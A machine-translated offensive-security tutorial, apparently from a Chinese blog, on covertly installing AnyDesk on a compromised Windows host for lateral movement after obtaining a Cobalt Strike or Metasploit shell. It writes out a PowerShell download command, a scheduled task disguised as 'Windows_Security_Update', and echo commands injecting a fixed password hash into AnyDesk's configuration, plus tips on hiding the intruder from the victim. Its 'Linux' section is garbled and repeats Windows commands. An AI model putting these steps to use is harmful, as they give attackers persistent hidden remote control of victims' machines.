Using anydesk remote control for intranet penetration horizontal movement

** Welcome to my WeChat official account. 《 The soul in the shell 》**

Anydesk Is similar to teamviewer Remote management software , But it doesn't need to be installed and is small

Use scenarios

• Cloud lock , The guardian God forbids 3389 Login time
• Similar to Alibaba cloud , Sign in 3389 Will call the police
• The target machine must be able to go out of the network

matters needing attention

• start-up anydesk The permission of requires desktop user permission , such as ,IIS In the middleware environment , Got it webshell Generally, there is no desktop user permission , If you start anydesk It won't work
• start-up anydesk The desktop cannot be logged off
• There may be a black screen connected , This is because the desktop user exits the remote desktop without logging off , here , Unless it works winlogon start-up anydesk, Otherwise you can't use the screen

attack

Windows

If we were windows Get the target on shell, In order to facilitate the simulation, a cs Of shell

Use some rights raising powershell Script , The script pops up a new cmd window , But the data does not pass cs, It can only be operated through remote desktop , But not directly RDP

Then we can make the target download through the command anydesk

powershell (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\anydesk.exe") 

In fact, it's better not to keep it in c Under the plate , Because the domain user does not have sufficient permissions , So it is best to find the folder where the domain user has write permission

You can see that we have downloaded the file ( Since it is a simulated environment, just click it casually , Don't download to the desktop in the real environment )

But there is no hurry to implement , The reason is that we don't know the evidence of the goal , Nature can't connect

Open your own computer anydesk, A window will pop up

You can find ,anydesk The way of connection is not LAN , But through the Internet , Once the network is disconnected, it cannot be used

So we have to know the target ID No. can be connected , So we can generate... Locally anydesk User profile for , Then upload to the target host , In this way, we not only know the goal anydesk Of id Number , And the password set locally is used

First of all, we should remember our own ID Number

• 819784857

Then set the access password

Just set up , Just know for yourself

Exit completely after application anydesk, Do not select Install... When exiting

The generated configuration file will be stored in

C:\Users\ Your username \AppData\Roaming\AnyDesk

Then save the four files , Then upload to the target host , Delete all the configuration files here after uploading , The goal is to make anydesk Generate a new configuration

Because we haven't opened it on the target host yet anydesk, So create a new one by yourself AnyDesk Folder , Then copy the file in

expand ：

These steps are not necessary , On demand

You can set the user name before connecting , If not set , Will use the current user name

It may expose your identity

And then through cs Remote execution anydesk, Then connect to the attacker remotely

Enter the password you just set

Successfully connected

If you have administrator privileges , Can be opened “ Disable user input ”、“ Enable privacy mode ”, Otherwise, the opponent can see the mouse of the attacker

Linux

If we can only pass linux Got the target shell, You can't create a configuration file and copy it as before , So we can only modify the configuration file

In order to facilitate the simulation, I launched a msf Of shell

First we need to make the target download anydesk, The method is the same as before

powershell (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\anydesk.exe") 

After downloading, we will start it , Can be executed directly , If it is not possible to execute directly , You can use scheduled tasks to perform , If you want to use a scheduled task , First, you need to know who the current user is

powershell "(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"explorer.exe\"').GetOwner().user) -split '\n')[0] 

After confirming the user, you can create a scheduled task

schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\Users\testuser.G1TS\Desktop\anydesk.exe" /RU Administrator 

Then execute the planned task

schtasks /run /tn Windows_Security_Update 

After a few seconds ,anydesk Connect to the server and kill the process

tasklist
taskkill /f /pid 2692 

Then add the password to the configuration file ( The password for AnyDeskGetAccess)

echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\Users\ User directory \AppData\Roaming\AnyDesk\service.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\ User directory \AppData\Roaming\AnyDesk\service.conf

View target's ID

type C:\Users\ user name \AppData\Roaming\AnyDesk\system.conf 

Then let the target machine run Anydesk, Just connect